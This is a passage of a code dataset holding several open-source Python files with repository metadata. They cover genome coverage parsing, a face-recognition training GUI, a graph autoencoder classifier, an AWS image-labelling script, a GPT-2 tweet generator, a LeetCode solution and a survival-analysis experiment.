bc_span_dd.items():\n        bc_arr[span_beg:span_end] += 1\n    h5_writer.create_dataset(\"{0}/bc\".format(curr_rn), data=bc_arr)\n\n    num_parsed_contigs += 1\n\n    logging.info('Parsed {0} contigs in total'.format(num_parsed_contigs))\n    logging.info('finished parsing {0}'.format(input_bam))\n\n    h5_writer.close()\n\n# def write_span_results(span_dd, output):\n#     logging.info('writing results to {0}'.format(output))\n\n#     with open(output, 'wt') as opf:\n#         csvwriter = csv.writer(opf, delimiter='\\t')\n#         total_contigs = len(span_dd.keys())\n#         for ck, (contig, val_dd) in enumerate(span_dd.items()):\n#             for (bc, values) in val_dd.items():\n#                 if lib_id:\n#                     bc += '-{0}'.format(lib_id)\n#                 csvwriter.writerow([contig, bc] + list(values))\n#             if (ck + 1) % 100000 == 0:\n#                 logging.info('processed {0}/{1} ({2:.2%})'.format(\n#                     ck + 1, total_contigs, (ck + 1) / total_contigs))\n#         logging.info('processed {0}/{1} ({2:.2%})'.format(\n#             ck + 1, total_contigs, (ck + 1) / total_contigs))\n\n\nif __name__ == \"__main__\":\n    out_csv = sys.argv[1]\n    lib_id = sys.argv[2]\n    in_bam = sys.argv[3]  # e.g. 
already merged from the same library\n\n # gen_barcode_and_read_cov(in_bam, lib_id)\n # write_span_results(res, out_csv)\n", "repo_name": "zyxue/assembly-inspector", "sub_path": "calc_cov.py", "file_name": "calc_cov.py", "file_ext": "py", "file_size_in_byte": 5055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 79, "usage_type": "call"}, {"api_name": "pysam.AlignmentFile", "line_number": 80, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.uint", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.uint", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.uint", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.uint", "line_number": 115, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 128, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 141, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 142, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 165, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 166, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 167, "usage_type": "attribute"}]} +{"seq_id": "11608897947", "text": "from logging import exception\nfrom tkinter import*\nfrom tkinter import ttk\nfrom turtle import color\nfrom PIL import Image, ImageTk\nfrom tkinter import messagebox\n\nfrom setuptools import Command\nimport mysql.connector\nimport cv2\nimport os #for accessing folders and files\nimport numpy as np\n\n\nclass Train:\n def __init__(self, root):\n self.root = root\n self.root.geometry(\"1530x790+0+0\") #set according to display size\n self.root.title(\"face Recognition System\")\n self.root.wm_iconbitmap(\"face.ico\")\n\n\n\n # background\n\n bg1_lbl = Frame(self.root, bg=\"#E4D1B9\")\n bg1_lbl.place(x=0, y=0, width=15300, height=10000)\n\n title_lbl = Label(bg1_lbl, text=\"STUDENT MANAGEMENT SYSTEM\", font=(\n \"times new roma\", 35, \"bold\"),bg=\"#B8F1B0\", fg=\"#16003B\")\n title_lbl.place(x=0, y=40, width=1530, height=45)\n\n \n #button\n\n img6 = Image.open(\n r\"images\\train.jpg\")\n img6 = img6.resize((300, 300), Image.ANTIALIAS)\n self.photoimg6 = ImageTk.PhotoImage(img6)\n\n b1 = Button(bg1_lbl, image=self.photoimg6, cursor=\"hand2\")\n b1.place(x=600, y=200, width=300, height=300)\n\n b1_1 = Button(bg1_lbl, text=\"Train Data\",command=self.train_classifier, cursor=\"hand2\", font=(\n \"times new roman\", 15, \"bold\"), bg=\"#764AF1\", fg=\"white\",activeforeground=\"white\", activebackground=\"red\")\n b1_1.place(x=600, y=500, width=300, height=40)\n\n def train_classifier(self):\n data_dir=(\"data\")\n path=[os.path.join(data_dir,file) for file in os.listdir(data_dir)]\n\n faces=[]\n ids=[]\n \n for image in path:\n img=Image.open(image).convert('L') #Gray scale image\n imageNp=np.array(img,'uint8')\n id=int(os.path.split(image)[1].split('.')[1])\n\n faces.append(imageNp)\n ids.append(id)\n\n 
cv2.imshow(\"Train\",imageNp)\n            cv2.waitKey(1)\n        ids=np.array(ids)\n\n        #Train the classifier and save\n\n        clf=cv2.face.LBPHFaceRecognizer_create() #for recognizing faces\n        clf.train(faces,ids) #train\n        \n        clf.write(\"classifier.xml\")\n        cv2.destroyAllWindows()\n        messagebox.showinfo(\"Result\",\"Training datasets completed\",parent=self.root)\n\n\nif __name__ == \"__main__\":\n    root = Tk()\n    obj = Train(root)\n    root.mainloop()", "repo_name": "aryanjais1234/Face_Reco", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 38, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 38, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 39, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.face.LBPHFaceRecognizer_create", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.face", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cv2.destroyAllWindows", "line_number": 73, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 74, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 74, "usage_type": "name"}]}
{"seq_id": "32421140298", "text": "# Install required packages.\nimport datetime\nimport os\nimport torch\nimport numpy as np\nfrom sklearn.model_selection import KFold\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\nimport torch.nn.functional as F\nfrom torch_geometric.transforms import RandomLinkSplit, RandomNodeSplit\nfrom torch_geometric.utils import train_test_split_edges\n\nfrom models import GCNEncoder\nfrom models import GCN\nfrom torch_geometric.nn import GAE\nfrom torch_geometric.nn import GCNConv\nfrom metrics import nmi_score, ari_score, cluster_acc\n\nos.environ['TORCH'] = torch.__version__\nprint(torch.__version__)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n'''\nprint(\"==========RandomLinkSplit==========\")\ntransform = RandomLinkSplit(is_undirected=True)\ntrain_data, val_data, test_data = transform(data)\ntrain_mask = [1 if i in train_data.edge_label_index[0] else 0 for i in range(0,data.num_nodes)]\nval_mask = [1 if i in val_data.edge_label_index[0] else 0 for i in range(0,data.num_nodes)]\ntrain_num = sum(train_mask)\nval_num = sum(val_mask)\n\nx = train_data.x.to(device)\ny = data.y.long().to(device)\ntrain_pos_edge_index = 
train_data.edge_label_index.to(device)\nval_pos_edge_index = val_data.edge_label_index.to(device)\n'''\n# different datasets\n# data_path = './data/split_data.pt' # original Geolife (86113)\n# data_path = './feature_learning/bert/data/gnn/geolife_ts/processed/data.pt'\ndata_path = './feature_learning/bert/data/gnn/geolife_ts/processed' # Geolife with timeslots (275)\ndata_path = './feature_learning/bert/data/gnn/geolife_ts_79/processed' # Geolife with max_len set to 79 (61147)\n# data_path = './data/gnn/filtered/processed'\ndata_path = './feature_learning/bert/data/gnn/geolife_e2dtc_filtered/processed'\n\nprint(15*'='+'Load Dataset'+15*'=')\ndata = torch.load(data_path+'/split_edges_data.pt')\n\n# print(\"==========train_test_split_edges(data)==========\")\n# data.train_mask = data.val_mask = data.test_mask = None\n# data = train_test_split_edges(data)\n# torch.save(data, data_path + '/split_edges_data.pt')\n# data = dataset[0]\nprint(data)\nprint()\n\n'''\ntrain_mask = torch.tensor([True if i in data.train_pos_edge_index[0] else False for i in range(0,data.num_nodes)])\nval_mask = torch.tensor([True if i in data.val_pos_edge_index[0] else False for i in range(0,data.num_nodes)])\ntest_mask =torch.tensor([True if i in data.test_pos_edge_index[0] else False for i in range(0,data.num_nodes)])\n'''\n\nprint(15*'='+'Split Nodes'+15*'=')\ntransform = RandomNodeSplit(split='train_rest',num_val=0.1,num_test=0.1)\ndata = transform(data)\ntrain_mask = data.train_mask\nval_mask = data.val_mask\ntest_mask = data.test_mask\nprint(data)\nprint()\n\ntrain_num = sum(train_mask)\nval_num = sum(val_mask)\ntest_num = sum(test_mask)\nprint('train_num: {}, val_num: {}, test_num: {}'.format(train_num, val_num, test_num))\n\nx = data.x.to(device)\ny = data.y.long().to(device)\ntrain_pos_edge_index = data.train_pos_edge_index.to(device)\nval_pos_edge_index = data.val_pos_edge_index.to(device)\ntest_pos_edge_index = data.test_pos_edge_index.to(device)\n# parameters\nout_channels = 256\nnum_features = data.num_features\nepochs = 200\n\n# model\nclass MODEL(torch.nn.Module):\n    def __init__(self, num_features=256, out_channels=out_channels, hidden_channels=64):\n        super().__init__()\n        torch.manual_seed(1234567)\n        self.gaeLayer = GAE(GCNEncoder(num_features, out_channels))\n        self.classifyLayer = GCN(out_channels, hidden_channels)\n\n    def forward(self, x, edge_index):\n        z = self.gaeLayer.encoder.forward(x, edge_index)\n        c = self.classifyLayer.forward(z, edge_index)\n        return c\n\nmodel = MODEL(num_features, out_channels, hidden_channels=64)\nprint(15*'='+'Print Model'+15*'=')\nprint(model)\n\n# move to GPU (if available)\nmodel = model.to(device)\n\n# initialize the optimizer\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01)\ncriterion = torch.nn.CrossEntropyLoss().to(device)\n\ndef train():\n    model.train()\n    optimizer.zero_grad()\n    z = model.gaeLayer.encode(x, train_pos_edge_index)\n    out = model.classifyLayer(z, train_pos_edge_index)\n    # Compute the loss solely based on the training nodes.\n    recon_loss = model.gaeLayer.recon_loss(z, train_pos_edge_index)\n    classify_loss = criterion(out[train_mask], y[train_mask])\n    # if args.variational:\n    loss = recon_loss + classify_loss\n\n    # loss = loss + (1 / data.num_nodes) * model.kl_loss()\n\n    loss.backward()\n    optimizer.step()\n\n    pred = out.argmax(dim=1)  # Use the class with highest probability.\n    pred_result = pred[train_mask]\n    label = y[train_mask]  # Check against ground-truth labels.\n\n    # train_correct = pred_result.eq(label)\n    # tmp1 = train_correct.sum()\n    # tmp2 = train_mask.long().sum()\n    # 
train_acc = int(tmp1) / int(tmp2) # Derive ratio of correct predictions.\n\n train_acc = cluster_acc(label.cpu().numpy(), pred_result.cpu().numpy()) # UACC\n nmi = nmi_score(label.cpu(), pred_result.cpu())\n ari = ari_score(label.cpu(), pred_result.cpu())\n\n return recon_loss, classify_loss, train_acc, nmi, ari\n\n\ndef test():\n model.eval()\n with torch.no_grad():\n z = model.gaeLayer.encode(x, test_pos_edge_index)\n out = model.classifyLayer(z, test_pos_edge_index)\n pred = out.argmax(dim=1) # Use the class with highest probability.\n correct = pred[test_mask].eq(y[test_mask]) # Check against ground-truth labels.\n acc = int(correct.sum()) / int(sum(test_mask)) # Derive ratio of correct predictions.\n nmi = nmi_score(y[test_mask].cpu(), pred[test_mask].cpu())\n ari = ari_score(y[test_mask].cpu(), pred[test_mask].cpu())\n return acc, nmi, ari\n\ndef val():\n model.eval()\n with torch.no_grad():\n z = model.gaeLayer.encode(x, val_pos_edge_index)\n out = model.classifyLayer(z, val_pos_edge_index)\n recon_loss = model.gaeLayer.recon_loss(z, val_pos_edge_index)\n classify_loss = criterion(out[val_mask], y[val_mask])\n pred = out.argmax(dim=1) # Use the class with highest probability.\n correct = pred[val_mask].eq(y[val_mask]) # Check against ground-truth labels.\n acc = int(correct.sum()) / int(sum(val_mask)) # Derive ratio of correct predictions.\n nmi = nmi_score(y[val_mask].cpu(), pred[val_mask].cpu())\n ari = ari_score(y[val_mask].cpu(), pred[val_mask].cpu())\n\n return recon_loss, classify_loss, acc, nmi, ari\n\nfrom torch.utils.data import Dataset, DataLoader,TensorDataset,random_split,SubsetRandomSampler, ConcatDataset\n\nprint(15*'='+'Start Training'+15*'=')\nprint(\"Total Epochs:\", epochs)\nfor epoch in range(1, epochs+1):\n\n train_recon_loss, train_classify_loss, train_acc, train_nmi, train_ari = train()\n val_recon_loss, val_classify_loss, val_acc, val_nmi, val_ari= val()\n print(f'Epoch: {epoch:03d}')\n print(\"Time:\", datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n print(f'Train Loss: {train_recon_loss+train_classify_loss:.4f}, Train Acc: {train_acc:.4f}, Train NMI: {train_nmi:.4f}, Train ARI: {train_ari:.4f}, recon_loss: {train_recon_loss:.4f}, cross_entropy_loss: {train_classify_loss:.4f}'\n f'\\nVal Loss: {val_recon_loss+val_classify_loss:.4f}, Val Acc: {val_acc:.4f}, Val NMI: {val_nmi:.4f}, Val ARI: {val_ari:.4f}, recon_loss: {val_recon_loss:.4f}, cross_entropy_loss: {val_classify_loss:.4f}')\n\nacc, nmi, ari = test()\nprint(15*'=' + 'Test Result' + 15*'=')\nprint(f'test_acc: {acc:.4f}, test_nmi: {nmi:.4f}, test_ari: {ari:.4f}')\n\ntorch.save(model,'./models/GAE.pt')\n", "repo_name": "Zhenyu-Lii/traj_clustering", "sub_path": "classification_GAE.py", "file_name": "classification_GAE.py", "file_ext": "py", "file_size_in_byte": 7490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.__version__", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.__version__", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 47, "usage_type": "call"}, {"api_name": "torch_geometric.transforms.RandomNodeSplit", "line_number": 64, "usage_type": 
"call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 91, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GAE", "line_number": 92, "usage_type": "call"}, {"api_name": "models.GCNEncoder", "line_number": 92, "usage_type": "call"}, {"api_name": "models.GCN", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 108, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "attribute"}, {"api_name": "metrics.cluster_acc", "line_number": 136, "usage_type": "call"}, {"api_name": "metrics.nmi_score", "line_number": 137, "usage_type": "call"}, {"api_name": "metrics.ari_score", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 145, "usage_type": "call"}, {"api_name": "metrics.nmi_score", "line_number": 151, "usage_type": "call"}, {"api_name": "metrics.ari_score", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 157, "usage_type": "call"}, {"api_name": "metrics.nmi_score", "line_number": 165, "usage_type": "call"}, {"api_name": "metrics.ari_score", "line_number": 166, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "35032662062", "text": "#usr/bin/env python\nimport click\nimport boto3\n\ndef labels(bucket, name):\n\t\"\"\"This takes an S3 bucket and a image name\"\"\"\n\t\n\tprint(f\"This is the bucketname {bucket} !\")\n\tprint(f\"This is the imagename {name} !\")\n\trekognition = boto3.client(\"rekognition\")\n\tresponse = rekognition.detect_labels(\n\t\t\tImage={\n\t\t\t\t\"S3Object\": {\n\t\t\t\t\t\"Bucket\": bucket,\n\t\t\t\t\t\"Name\": name,\n\t\t\t\t}\n\t\t\t},\n\t\t)\n\tlabels = response['Labels']\nbucket =\"function-bike-rider-ms\"\nname =\"cat.jpg\"\nresults = labels(bucket,name)\t\nprint (results)\n\t", "repo_name": "Manjima24/function-bike-rider", "sub_path": "labels.py", "file_name": "labels.py", "file_ext": "py", "file_size_in_byte": 505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "boto3.client", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "36912412542", "text": "import os\nimport pandas as pd\nimport random\nfrom transformers import pipeline\n\nmodel = pipeline(\"text-generation\", model=\"gpt2\")\ntalie_hist_tweets = t_df = pd.read_csv(f'{os.path.dirname(__file__)}/talies_tweets.csv').text.to_list()\nstuff_talie_likes = ['ohio', 'midwest', 'mahjong', 'the bachelor', 'yoga', 'drop dead gorgeous the movie',\n 'dog agility', 'the G train', 'ABBA', 'weed', 'psychology', 'The Mets', 'The Sims',\n 'The University of Michigan', 'journaling', 'skincare', 'Kate Bush', 'being a Taurus',\n 'kiwis', 'dog agility']\ntalies_friends = ['renzi', 'josh', 'katie', 'coco', 'jane', 'victoria', 'sarah', 'claudia', 'natalie']\n\n\ndef replace_anon_with_friend(tweet):\n ind = tweet.index('_')\n res = tweet.replace('_', '')\n friend = talies_friends[random.randrange(len(talies_friends))]\n if len(res) == 0:\n return friend\n res = res[:ind] + friend + res[ind:]\n return res\n\n\ndef generate_tweet():\n hist_tweet = 
talie_hist_tweets[random.randrange(len(talie_hist_tweets))]\n    print(f\"remember when I said |{hist_tweet}|?\")\n    thing_talie_likes = stuff_talie_likes[random.randrange(len(stuff_talie_likes))]\n    print(f\"now i've got {thing_talie_likes} on my mind\")\n    joke_spec_hist_tweet = f'I remembered when I said {hist_tweet}, and it made me think about ' \\\n                           f'{thing_talie_likes} ' \\\n                           f'and so here is what I thought next: '\n    gen_text = model(joke_spec_hist_tweet,\n                     do_sample=True, top_k=50,\n                     temperature=0.9, max_length=100)[0]['generated_text']\n    text_without_hist = gen_text[len(joke_spec_hist_tweet):]\n\n    # Remove newlines.\n    tweet = text_without_hist.replace('\\n', '')\\\n        .replace('\"', '')\\\n        .replace(',', '')\\\n        .replace('@', '')\\\n        .replace('https://', '')\n\n    # Tokenize sentences.\n    tweet_sentences = tweet.split('.')\n    tweet_sentences = [t for t in tweet_sentences if len(t) > 10]\n\n    # Take the first one, lowercase.\n    tweet = tweet_sentences[0].lower().strip()\n    if '__' in tweet:\n        tweet = replace_anon_with_friend(tweet)\n    return tweet\n\n\ndef generate_tweet_with_retries():\n    num_retries = 100\n    for try_num in range(0, num_retries):\n        try:\n            return generate_tweet()\n        except:\n            print(f'Failed, trying {num_retries - try_num} more times.')\n", "repo_name": "JohnEFerguson/taliebot", "sub_path": "taliebot/tweet_generator.py", "file_name": "tweet_generator.py", "file_ext": "py", "file_size_in_byte": 2435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "transformers.pipeline", "line_number": 6, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 18, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 26, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 28, "usage_type": "call"}]}
{"seq_id": "22419381176", "text": "# 81. 
Search in Rotated Sorted Array II\n# Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.\n#\n# (e.g., the array [0,0,1,2,2,5,6] might become [2,5,6,0,0,1,2]).\n#\n# Write a function to determine whether a given target value exists in the array. Return true if it exists, otherwise return false.\nfrom typing import List\n\n\nclass Solution:\n    def search(self, nums: List[int], target: int) -> bool:\n        # Drop trailing elements equal to the first one, so the half-interval check below cannot be misled\n        while len(nums) > 1 and nums[0] == nums[-1]:\n            nums.pop()\n        n = len(nums)\n        begin = 0\n        end = n - 1\n        while begin <= end:\n            mid = (begin + end) // 2\n            if nums[mid] == target:\n                return True\n            if nums[0] <= nums[mid]:\n                if nums[0] <= target < nums[mid]:\n                    end = mid - 1\n                else:\n                    begin = mid + 1\n            elif nums[0] > nums[mid]:\n                if nums[mid] < target <= nums[-1]:\n                    begin = mid + 1\n                else:\n                    end = mid - 1\n        return False\n", "repo_name": "JackTJC/LeetCode", "sub_path": "back_search/SearchRotate2.py", "file_name": "SearchRotate2.py", "file_ext": "py", "file_size_in_byte": 1137, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 11, "usage_type": "name"}]}
{"seq_id": "74866977765", "text": "import numpy as np\nimport scipy as sp\nimport pandas as pd\nfrom tqdm import tqdm\nimport copy\nimport time\n\nfrom jax.config import config\nconfig.update(\"jax_enable_x64\", True)\n\nimport jax.numpy as jnp\nfrom jax import random\nfrom surv_copula.main_copula_survreg_gaussian import fit_copula_survival,predict_copula_survival,check_convergence_pr,predictive_resample_survival\n\n#Import data\ndata = pd.read_csv('./data/melanoma.csv')\nt = np.array(data['t'])\ndelta = np.array(data['delta'])\nx = np.array(data['x'])\n\n#Normalize\nscale = (np.sum(t)/np.sum(delta))\nt_norm = t/scale\nmean_x = np.mean(x)\nstd_x = np.std(x)\nx_norm =(x- mean_x)/std_x\n\n#Randomize\nnp.random.seed(120)\nn = np.shape(t_norm)[0]\nind = np.random.permutation(np.arange(n))\nt_norm = t_norm[ind]\ndelta = delta[ind]\nx_norm = x_norm[ind]\n\n\n#Initialize plot and sample number\nB = 2000 #number of posterior samples\nT = 10000 #number of forward samples\nkey = random.PRNGKey(101)\ny_plot = np.arange(0,np.max(t),100)/scale\n\n\n#NONPARAMETRIC PREDICTIVE SMC#\n\n## TREATMENT ##\n#Specify rho grid to choose rho\nrho_grid = np.array([0.5,0.6,0.7,0.8,0.9])\nrho_,rho_x_ = np.meshgrid(rho_grid,rho_grid)\nhyperparam_grid = np.vstack([rho_.ravel(), rho_x_.ravel()]).transpose()\n\n# #Pass grid of rho values\ncop_surv_obj = fit_copula_survival(t_norm,delta,x_norm, B,hyperparam_grid = hyperparam_grid)\n\n#Gradient\n#cop_surv_obj = fit_copula_survival(t_norm,delta,x_norm, B)\nprint('Optimal rho is {}'.format(cop_surv_obj.rho_opt))\nprint('Optimal rho_x is {}'.format(cop_surv_obj.rho_x_opt))\n\n#Compute predictive cdf for various x values for survival plot\nfor x_ in np.array([1.5,3.4,6.1]):\n\tx_norm_ = (x_- mean_x)/std_x\n\tx_plot = x_norm_*np.ones(np.shape(y_plot)[0])\n\tlogcdf_av, logpdf_av = predict_copula_survival(cop_surv_obj,y_plot,x_plot)\n\tjnp.save('plot_files/melanoma_logpdf_av_copula_x{}'.format(x_),logpdf_av)\n\tjnp.save('plot_files/melanoma_logcdf_av_copula_x{}'.format(x_),logcdf_av)\n\n#Predictive resample at x= 3.4\nx_norm_ = (3.4- mean_x)/std_x\nx_plot = x_norm_*np.ones(np.shape(y_plot)[0])\nlogcdf_pr, logpdf_pr = predictive_resample_survival(cop_surv_obj,y_plot,x_plot, T_fwdsamples = T)\n\n#Assessing convergence\n_,_,pdiff,cdiff = check_convergence_pr(cop_surv_obj,y_plot,x_plot,5,25000)\n\n#Save all 
files\njnp.save('plot_files/melanoma_ESS_copula',cop_surv_obj.ESS)\njnp.save('plot_files/melanoma_particle_ind_copula',cop_surv_obj.particle_ind)\njnp.save('plot_files/melanoma_logpdf_samp_copula',logpdf_pr)\njnp.save('plot_files/melanoma_logcdf_samp_copula',logcdf_pr)\njnp.save('plot_files/melanoma_pdiff_copula',pdiff)\njnp.save('plot_files/melanoma_cdiff_copula',cdiff)\njnp.save('plot_files/melanoma_rho_copula', cop_surv_obj.rho_opt)\njnp.save('plot_files/melanoma_rhox_copula', cop_surv_obj.rho_x_opt)\njnp.save('plot_files/melanoma_y_plot',y_plot)\n\n#compute cdf to obtain median function\ndy_med = 0.02\ny_plot_med = np.arange(dy_med,1.5,dy_med)\nn_x = 40\nx_grid = np.linspace(np.min(x_norm), np.max(x_norm),n_x)\nmedian_fun = np.zeros(n_x)\nfor i in range(n_x):\n\tx_plot = x_grid[i]*np.ones(np.shape(y_plot_med)[0])\n\tlogcdf_av, logpdf_av = predict_copula_survival(cop_surv_obj,y_plot_med,x_plot)\n\tmedian_fun[i] = y_plot_med[np.argmin(np.abs(np.exp(logcdf_av) - 0.5))]\n\njnp.save('plot_files/melanoma_median_fun',median_fun)\njnp.save('plot_files/melanoma_x_grid',x_grid)", "repo_name": "edfong/survival_mp", "sub_path": "run_expts/3_melanoma_full.py", "file_name": "3_melanoma_full.py", "file_ext": "py", "file_size_in_byte": 3297, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "jax.config.config.update", "line_number": 9, "usage_type": "call"}, {"api_name": "jax.config.config", "line_number": 9, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 31, "usage_type": "call"}, {"api_name": "jax.random.PRNGKey", "line_number": 40, "usage_type": "call"}, {"api_name": "jax.random", "line_number": 40, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 50, "usage_type": "call"}, {"api_name": "surv_copula.main_copula_survreg_gaussian.fit_copula_survival", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 63, "usage_type": "call"}, {"api_name": "surv_copula.main_copula_survreg_gaussian.predict_copula_survival", "line_number": 64, "usage_type": "call"}, {"api_name": "jax.numpy.save", "line_number": 65, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 65, "usage_type": 
"name"}, {"api_name": "jax.numpy.save", "line_number": 66, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 70, "usage_type": "call"}, {"api_name": "surv_copula.main_copula_survreg_gaussian.predictive_resample_survival", "line_number": 71, "usage_type": "call"}, {"api_name": "surv_copula.main_copula_survreg_gaussian.check_convergence_pr", "line_number": 74, "usage_type": "call"}, {"api_name": "jax.numpy.save", "line_number": 77, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 77, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 78, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 78, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 79, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 79, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 80, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 80, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 81, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 81, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 82, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 82, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 83, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 83, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 84, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 84, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 85, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 85, "usage_type": 